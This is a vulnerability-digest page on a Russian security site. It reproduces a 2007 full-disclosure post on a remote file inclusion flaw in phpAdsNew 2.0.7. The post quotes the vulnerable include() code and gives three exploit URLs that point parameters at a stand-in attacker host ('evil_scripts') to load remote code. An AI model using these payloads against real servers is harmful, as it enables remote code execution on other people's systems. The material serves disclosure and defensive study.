Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Maxtricity Tagger Password Disclosure Vulnerability

ZixForum <= 1.14 (Zixforum. mdb) Remote Password Disclosure Vulnerability

[Full-disclosure] [OPENADS-SA-2007- 001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

Toxiclab Shoutbox Password Disclosure Vulnerability

From:	mr alkomandoz <k3g_(at)_hackermail.com>
Date:	24 января 2007 г.
Subject:	phpAdsNew 2.0.7 Remote File Include

-----------------------------------------------

phpAdsNew 2.0.7 Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------

Vuln Code:

include_once ($phpAds_geoPlugin);

.......................

function phpAds_ReportGetPluginInfo($filename)
{
       include ($filename);
       return  ($plugin_info_function());
..........................

include ($phpAds_config['my_footer']);


-----------------------------------------------

3xplo!t:


phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http:
//evil_scripts?

phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts?

phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http:
//evil_scripts?



-----------------------------------------------

download:  http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.zip

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR

SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team



                                                   ##############################
#####################
         
          AsB-MaT.NeT & D4eG.OrG
                                             ####################################
###############




--
_______________________________________________
Get your free email from http://www.hackermail.com